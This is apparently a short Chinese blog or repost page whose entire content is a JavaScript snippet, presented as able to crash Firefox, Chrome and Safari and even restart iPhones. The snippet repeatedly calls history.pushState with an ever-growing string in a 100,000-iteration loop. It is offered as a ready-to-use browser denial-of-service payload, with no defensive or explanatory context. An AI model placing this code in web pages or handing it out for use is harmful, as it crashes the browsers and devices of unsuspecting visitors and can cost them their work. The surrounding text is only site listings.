hookjoy

JavaScript代码,能导致火狐、谷歌Safari浏览器崩溃,甚至让iPhone重启

<html>
<body>
<script>
var total = "";
for(var i = 0; i < 100000; i++)
{

    total = total + i.toString();
	history.pushState(0,0,total);
	
}
</script>
</body>
</html>

  

分类:

技术点:

相关文章:

  • 2021-11-27
  • 2021-10-21
  • 2021-06-22
  • 2021-11-12
  • 2022-01-12
  • 2021-12-07
  • 2021-06-07
猜你喜欢
  • 2021-11-27
  • 2021-07-12
  • 2021-09-18
  • 2021-12-10
  • 2021-07-25
  • 2021-10-15
  • 2021-08-16
相关资源
相似解决方案